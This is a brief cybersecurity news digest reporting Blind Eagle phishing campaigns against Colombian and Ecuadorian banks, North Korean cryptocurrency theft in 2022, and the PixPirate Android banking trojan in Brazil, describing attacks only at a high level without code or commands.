Colombia- and Ecuador-based organizations are being targeted by the Spanish-speaking threat group Blind Eagle, also known as APT-C-36, which has reemerged with a strengthened toolset and infection chain, The Hacker News reports.
Blind Eagle has targeted banks including Banco AV Villas, BBVA, Banco Caja Social, Banco de Bogota, Bancoomeva, Banco Popular, Colpatria, Davivienda, and TransUnion with phishing emails containing a malicious link that triggers Quasar RAT deployment, according to a Check Point report.
Meanwhile, a related campaign aimed at both countries involves the impersonation of Ecuador's Internal Revenue Services to facilitate a multi-stage attack chain exploiting the mshta.exe binary to download the ByAV2.py script that executes a Meterpreter payload, as well as the mp.py script, which is also a Meterpreter artifact.
"Blind Eagle is a strange bird among APT groups. Judging by its toolset and usual operations, it is clearly more interested in cybercrime and monetary gain than in espionage," said researchers.
North Korean hackers have stolen $630 million in cryptocurrency assets in 2022, the highest on record, reports Reuters. Sophisticated techniques have been leveraged by North Korean threat actors to facilitate the record-high theft of virtual assets, which are being allocated toward its nuclear weapons programs, according to a United Nations report. Such a figure comes after a cybersecurity firm earlier reported that more than $1 billion in cryptocurrency have been stolen by North Koreans last year. "The variation in USD value of cryptocurrency in recent months is likely to have affected these estimates, but both show that 2022 was a record-breaking year for DPRK (North Korea) virtual asset theft," said the U.N. report.
Several financial institutions in Brazil have been targeted by the novel Android banking trojan PixPirate that exploits the PIX payments platform for fraudulent activities, according to The Hacker News.